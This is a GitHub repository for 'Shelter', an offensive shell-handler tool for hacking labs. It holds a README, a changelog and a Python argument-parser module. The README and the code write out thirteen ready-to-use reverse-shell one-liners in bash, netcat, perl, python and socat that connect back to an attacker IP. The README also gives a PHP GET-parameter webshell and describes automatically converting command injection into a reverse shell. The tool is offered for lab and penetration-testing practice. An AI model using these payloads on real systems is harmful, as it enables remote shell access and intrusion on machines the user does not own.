README.md
# Shelter
***
[![forthebadge](https://forthebadge.com/images/badges/built-with-love.svg)](https://forthebadge.com)  [![forthebadge made-with-python](http://ForTheBadge.com/images/badges/made-with-python.svg)](https://www.python.org/)

![Supported Python versions](https://img.shields.io/badge/python-3.7+-blue.svg) ![Supported OS](https://img.shields.io/badge/Linux-FCC624?style=flat&logo=linux&logoColor=black)  [![Upload Python Package](https://github.com/Xyan1d3/shelter/actions/workflows/python-publish.yml/badge.svg)](https://github.com/Xyan1d3/shelter/actions/workflows/python-publish.yml)  ![PyPi Version](https://img.shields.io/pypi/v/pwnshelter.svg)  ![Licence](https://img.shields.io/pypi/l/pwnshelter.svg)  ![Wheel Status](https://pypip.in/wheel/pwnshelter/badge.svg) ![Github All Releases](https://img.shields.io/github/downloads/Xyan1d3/shelter/total.svg)  ![Issues](https://img.shields.io/github/issues/Xyan1d3/shelter)

**Shelter the magical Shell Handler.**
**A tool made for the Hackers by an Hacker.**
![](img/Pasted_image_20210428200307.png)
## What is it ?

Shelter is a new way to catch reverse shell's and also reduces the effort of visiting `pentestmonkey` and `highoncoffee`frequently for reverse shell payloads and changing of the `Attacker-IP` and `Attacker-Port` everytime.

Shelter is made to perform in 4 mode's. The required mode can be easily set by passing the argument of the mode to the script.
- **rev** : Generates and copies reverse shell payload with `IP` and `port` set to clipboard and also starts up a netcat.
- **web** : Webshell interactor for GET parameter command injection in php.
- **webrev** : Convert's a classic GET parameter command injection in php to a reverse shell.
- **host** : Will host post exploitation module's like `pspy`,`linpeas` etc. from the attackbox using `python http.server` or `updog` and copy the web url to the clipboard. 

**This tool is focused towards the solver's of `hackthebox`, `tryhackme` or any other labs with `vpn` connection.**

***
## ✨ Features
### rev Module
- Generate and copy revshell payload with `ATTACKERIP`[default: tun0] and `ATTACKERPORT`. 
- Start's Up a netcat listener on that port for catching the shell.
- Support's `13` language's of reverse shell payload's all tested.
**Only Linux payload's are supported for now.**
- Reduces the hassle of visiting `pentestmonkey` or `highoncoffee` reverse shell cheatsheet for geting reverse shell payloads and changing the `IP` and `PORT` on it everytime.
**This tools is not claiming to be better than pentestmonkey or highoncoffee by any means.**
### web Module
- Reduces the hassle of writting commands in `burpsuite` in time of php parameter command injection and url encoding every time.
- Automatically, URL encodes the command before sending it.

### webrev Module
- Converts a dumb GET parameter command injection to a reverse shell.
- Generates a reverse shell payload with set `ATTACKERIP`[default : tun0] and `ATTACKERPORT` and sends it to webserver url encoded.
- Starts up a netcat listner on the given `ATTACKERPORT` for catching the shell.
### host Module[Coming Soon...]
- It will create a `www` directory with `phpreverseshell`, `powershell reverseshell`, while setting the `ATTACKERIP` and `ATTACKERPORT` and post exploitation tools like `pspy`,`linpeas`,`winpeas` etc. using `updog` or classic `python http.server`.
- It will also copy the url of the file hosted from the server to the clipboard for easy pasting and `wgetting`
***
## Usage
### Rev Module
#### Help Menu
```python
┌─[root@Xyan1d3]─[/opt/github/shelter]
└──╼ # ./shelter.py rev --help
usage: shelter.py rev [-h] {bash,bashi,bash196,bashrl,bash5,bashudp,nc_mkfifo,perl,py2,py,py2export,pyexport,socat} ...

optional arguments:
  -h, --help            show this help message and exit

Available Payloads:
  {bash,bashi,bash196,bashrl,bash5,bashudp,nc_mkfifo,perl,py2,py,py2export,pyexport,socat}
    bash                echo base64_encoded_bash-i_payload |base64 -d|bash
    bashi               bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1
    bash196             0<&196;exec 196<>/dev/tcp/ATTACKER_IP/ATTACKER_PORT; bash <&196 >&196 2>&196
    bashrl              exec 5<>/dev/tcp/ATTACKER_IP/ATTACKER_PORT;cat <&5 | while read line; do $line 2>&5 >&5; done
    bash5               bash -i 5<> /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0<&5 1>&5 2>&5
    bashudp             bash -i >& /dev/udp/ATTACKER_IP/ATTACKER_PORT 0>&1
    nc_mkfifo           rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc ATTACKER_IP ATTACKER_PORT >/tmp/f
    perl                perl -e 'use Socket;$i="ATTACKER_IP";$p=ATTACKER_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton
                        ($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("bash -i");};'
    py2                 python -c 'import
                        socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",ATTACKER_PORT));os.dup2(s.fileno(),0);
                        os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
    py                  python3 -c 'import
                        socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",ATTACKER_PORT));os.dup2(s.fileno(),0);
                        os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
    py2export           export RHOST="ATTACKER_IP";export RPORT=ATTACKER_PORT;python -c 'import
                        sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in
                        (0,1,2)];pty.spawn("bash")'
    pyexport            export RHOST="ATTACKER_IP";export RPORT=ATTACKER_PORT;python3 -c 'import
                        sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in
                        (0,1,2)];pty.spawn("bash")
    socat               socat TCP:ATTACKER_IP:ATTACKER_PORT EXEC:'bash',pty,stderr,setsid,sigint,sane
```
```python
┌─[root@Xyan1d3]─[/opt/github/shelter]
└──╼ # ./shelter.py rev py --help
usage: shelter.py rev py [-h] [--nohandler] [-i 127.0.0.1] [-p 8888]

optional arguments:
  -h, --help    show this help message and exit
  --nohandler   Copies only the revshell payload. [Does not start handler]
  -i 127.0.0.1  IP for reverse shell.
  -p 8888       PORT for reverse shell.
```

#### Taking a reverse shell from a docker container.
![](img/Pasted_image_20210428201310.png)

### Web Module
#### Help Menu
```python
┌─[root@Xyan1d3]─[/opt/github/shelter]
└──╼ # ./shelter.py web --help
usage: shelter.py web [-h] [-f F] [-param PARAM] [--ssl] [--nossl] URL

positional arguments:
  URL           Target URL [http://127.0.0.1/cmd.php]

optional arguments:
  -h, --help    show this help message and exit
  -f F          Filename of the webshell [Default : cmd.php]. Incase you enter only ip in url arg.
  -param PARAM  GET parameter to send commands.[Default: cmd]
  --ssl         Force HTTPS
  --nossl       Force downgrade to HTTP
```

By default it assume's filename `cmd.php` and GET parameter `cmd` if not specified as an argument.

The php code responsible for getting a simple GET parameter webshell.
```php
root@6a647b5a3d5f:~# cat cmd.php 
<?php system($_GET[cmd]); ?>
```
#### Webshell on a docker container.
![](img/Pasted_image_20210428202006.png)

### Webrev Module
#### Help Menu
```python
┌─[root@Xyan1d3]─[/opt/github/shelter]
└──╼ # ./shelter.py webrev --help                                                                                                                                        
usage: shelter.py webrev [-h] [-f F] [-param PARAM] [--ssl] [--nossl] URL {bash,bashi,bash196,bashrl,bash5,bashudp,nc_mkfifo,perl,py2,py,py2export,pyexport,socat} ...
                                                                                    
positional arguments:                                                                                                                                                    
  URL                   Target URL [http://127.0.0.1/cmd.php]                       
                                          
optional arguments:                                                                 
  -h, --help            show this help message and exit
  -f F                  Filename of the webshell [Default : cmd.php]. Incase you enter only ip in url arg.
  -param PARAM          GET parameter to send commands.[Default: cmd]                                                                                                    
  --ssl                 Force HTTPS                                                 
  --nossl               Force downgrade to HTTP
  
Available Payloads:                                                                                                                                                      
  {bash,bashi,bash196,bashrl,bash5,bashudp,nc_mkfifo,perl,py2,py,py2export,pyexport,socat}                                                                               
    bash                echo base64_encoded_bash-i_payload |base64 -d|bash          
    bashi               bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1                                                                                               
    bash196             0<&196;exec 196<>/dev/tcp/ATTACKER_IP/ATTACKER_PORT; bash <&196 >&196 2>&196                                                                     
    bashrl              exec 5<>/dev/tcp/ATTACKER_IP/ATTACKER_PORT;cat <&5 | while read line; do $line 2>&5 >&5; done                                                    
    bash5               bash -i 5<> /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0<&5 1>&5 2>&5
    bashudp             bash -i >& /dev/udp/ATTACKER_IP/ATTACKER_PORT 0>&1                                                                                               
    nc_mkfifo           rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc ATTACKER_IP ATTACKER_PORT >/tmp/f                                                             
    perl                perl -e 'use Socket;$i="ATTACKER_IP";$p=ATTACKER_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton
                        ($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("bash -i");};'                                                              
    py2                 python -c 'import                                                                                                                                
                        socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",ATTACKER_PORT));os.dup2(s.fileno(),0);          
                        os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'                                                                       
    py                  python3 -c 'import                                          
                        socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",ATTACKER_PORT));os.dup2(s.fileno(),0);          
                        os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'                                                                       
    py2export           export RHOST="ATTACKER_IP";export RPORT=ATTACKER_PORT;python -c 'import
                        sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in                    
                        (0,1,2)];pty.spawn("bash")'
    pyexport            export RHOST="ATTACKER_IP";export RPORT=ATTACKER_PORT;python3 -c 'import                                                                      
                        sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in
                        (0,1,2)];pty.spawn("bash")
    socat               socat TCP:ATTACKER_IP:ATTACKER_PORT EXEC:'bash',pty,stderr,setsid,sigint,sane
```
#### Revshell on a docker container.
![](img/Pasted_image_20210428223306.png)

***
# Disclaimer
Don't use this script for any malicious or illegal purpose's. The Author or any contributor of this repository or tool is not responsible for any of those activities.


CHANGELOG
v1.0.0(06/04/2021)

[+] Added Reverse Shells of some languages.
    'bash'
    'bashi'
    'bash196'
    'bashrl'
    'bash5'
    'bashudp'
    'nc_mkfifo'
    'perl'
    'py2'
    'py'
    'py2export'
    'pyexport'
    'socat'
[+] Currently only generates Reverse shell for IP 127.0.0.1 and port 8888

===============================================================================================
v1.0.1(06/04/2021)

[+] Now, It takes tun0 IP automatically. Incase not found prompts user for entering the nic for grabbing the IP.
[+] Now, It automatically finds out avaliable tcp port for recieving shells on attacker box.

===============================================================================================
v1.0.2(06/04/2021)

[+] Added --nohandler flag , which will not start revshell handler. Will only copy the revshell payload.

===============================================================================================
v1.0.3(06/04/2021)

[+] Added -i flag to supply custom ip for generating reverseshell.
[+] Added -p flag to supply custom port for generating reverseshell.

===============================================================================================
v1.0.4(07/04/2021)

[+] Added regex check for valid ipv4 address, when it is entered as an argument.
[+] Added regex check for checking valid port number.
[+] Updated requirements.txt
[+] Added a lot of comments.
[+] Binary will be released.

===============================================================================================
v1.0.5(07/04/2021)

[-] Bug fixed for crashing perl revshell.
[-] Bug fixed for the check of the port range.

[+] Added some fun text.

===============================================================================================
v1.1.0(08/04/2021)

[+] Webshell interactor feature is out.
[+] Added Webshell interactor flag -f which could be used to specify the filename [rev.php]
[+] Added webshell interactor flag -p which could be used to specify the GET parameter [?cmd=]

=====>Bugs
[-] The url is not checked for 404.
[-] --ssl and --nossl flags dont work on specifying http:// or https:// url.

===============================================================================================
v1.1.1(09/04/2021)

[+] The Webshell interactor exits if the site is 404 or the page contains "Not Found" or "404"
[+] Bug Fixed : Webshell interactor prints extra trailling line after the command output.

===============================================================================================
v1.1.2(19/04/2021)

[+] WEB Interactor : Added a bulk load of comments.
[+] WEB Interactor : Added Website availability 
[+] Added a Keyboard interupt error handling to the whole code and displays KTHXBYE(Message is inspired from old versions of https://github.com/byt3bl33d3r/CrackMapExec)
[+] WEB Interactor : Added exit and quit option on the webshell.


===============================================================================================
v1.2.0(19/04.2021)

[+] Added feature webrev which will get us a reverseshell form a GET webshell consisting <?php system($_GET[cmd]) ?>
[+] Changed the -p for the GET parameter to -param from -p
[+] Fixed Bug of Revshell which don't work without bash -c 

===============================================================================================
v2.0.0(11/06/2021)

[+] Major Codebase rework. Code's are now better organized for new features additions.

shelter/helpers/cli.py
import argparse
from shelter.helpers.stylize import *

web_args = {
        "url" : {
            "help": "Target URL [http://127.0.0.1/cmd.php]",
            "metavar": "URL"
        },
        "-f" : {
            "help": "Filename of the webshell [Default : cmd.php]. Incase you enter only ip in url arg.",
            "metavar" : "cmd.php"
        },
        "--param" : {
            "help": "GET parameter to send commands.[Default: cmd]"
        },
        "--ssl" : {
            "help": "Force HTTPS",
            "action": "store_true"
        },
        "--nossl" : {
            "help": "Force downgrade to HTTP",
            "action": "store_true"
        }
    }

revshell_args = {
    "-i" : {
        "action" : "store",
        "metavar" : "127.0.0.1",
        "help" : "IP for reverse shell."
        },
    "-p" : {
        "action" : "store",
        "metavar" : "8888",
        "help" : "For Attacker PORT"
        },
    "--nohandler" : {
        "action" : "store_true",
        "help" : "Copies only the revshell payload. [Does not start handler]"
        }  
}

revshell_payloads = {
    "bash" : {
            "help" : "echo base64_encoded_bash-i_payload |base64 -d|bash",
            "args" : revshell_args},
    "bashi" : {
            "help" : "bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1",
            "args" : revshell_args},
    "bash196" : {
            "help" : "0<&196;exec 196<>/dev/tcp/ATTACKER_IP/ATTACKER_PORT; bash <&196 >&196 2>&196",
            "args" : revshell_args},
    "bashrl" : {
            "help" : "exec 5<>/dev/tcp/ATTACKER_IP/ATTACKER_PORT;cat <&5 | while read line; do $line 2>&5 >&5; done",
            "args" : revshell_args},
    "bash5" : {
            "help" : "bash -i 5<> /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0<&5 1>&5 2>&5",
            "args" : revshell_args},
    "bashudp" : {
            "help" : "bash -i >& /dev/udp/ATTACKER_IP/ATTACKER_PORT 0>&1",
            "args" : revshell_args},
    "nc_mkfifo" : {
            "help" : "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc ATTACKER_IP ATTACKER_PORT >/tmp/f",
            "args" : revshell_args},
    "perl" : {
            "help" : """perl -e 'use Socket;$i="ATTACKER_IP";$p=ATTACKER_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("bash -i");};'""",
            "args" : revshell_args},
    "py2" : {
            "help" : """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",ATTACKER_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'""",
            "args" : revshell_args},
    "py" : {
            "help" : """python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",ATTACKER_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'""",
            "args" : revshell_args},
    "py2export" : {
            "help" : """export RHOST="ATTACKER_IP";export RPORT=ATTACKER_PORT;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'""",
            "args" : revshell_args},
    "pyexport" : {
            "help" : """export RHOST="ATTACKER_IP";export RPORT=ATTACKER_PORT;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")""",
            "args" : revshell_args},
    "socat" : {
            "help" : "socat TCP:ATTACKER_IP:ATTACKER_PORT EXEC:'bash',pty,stderr,setsid,sigint,sane",
            "args" : revshell_args},
}

modules = {
    "rev" : {
        "help" : "Revshell to clipboard",
        "data" : {"payload" : revshell_payloads}
        },
    "web": {
        "help" : "Webshell interactor",
        "data" : {"args" : web_args}
        },
    "webrev" : {
        "help" : "Webshell to Revshell",
        "data" : {
            "args" : web_args,
            "payload" : revshell_payloads
            } 
        },
    "host" : {
        "help" : "Copies a reverse shell file in pwd and hosts it and copies the ip to your clipboard",
        "data" : {}
        }
}

def generate_cli_args():
    global parser 
    parser= argparse.ArgumentParser(description=f"""
{bold}{green}
   _____ __         ____           
  / ___// /_  ___  / / /____  _____
  \__ \/ __ \/ _ \/ / __/ _ \/ ___/
 ___/ / / / /  __/ / /_/  __/ /    
/____/_/ /_/\___/_/\__/\___/_/     

{end}{bold}{red}To boldly catch shells even the size of a meteorite.      
{end}{bold}{orange}Version: v2.0.0 - 11/06/21 - Bides Das @Xyan1d3 {end}""",formatter_class=argparse.RawTextHelpFormatter)
    
    subparser = parser.add_subparsers(title="Available Modules", dest="module")
    for module_name,module_data in modules.items():
        subp = subparser.add_parser(module_name,help=module_data["help"])
        if "args" in module_data["data"]:
            for flags,flag_data in module_data["data"]["args"].items():
                subp.add_argument(flags,**flag_data) 
        if "payload" in module_data["data"]:
            subsubp = subp.add_subparsers(title="Available Payloads",dest='lang',help=False)
            for payload,payload_data in revshell_payloads.items():
                subsubsubp = subsubp.add_parser(payload,help=payload_data["help"])
                for flags,flags_data in payload_data["args"].items():
                    subsubsubp.add_argument(flags,**flags_data)
    args = parser.parse_args()
    return args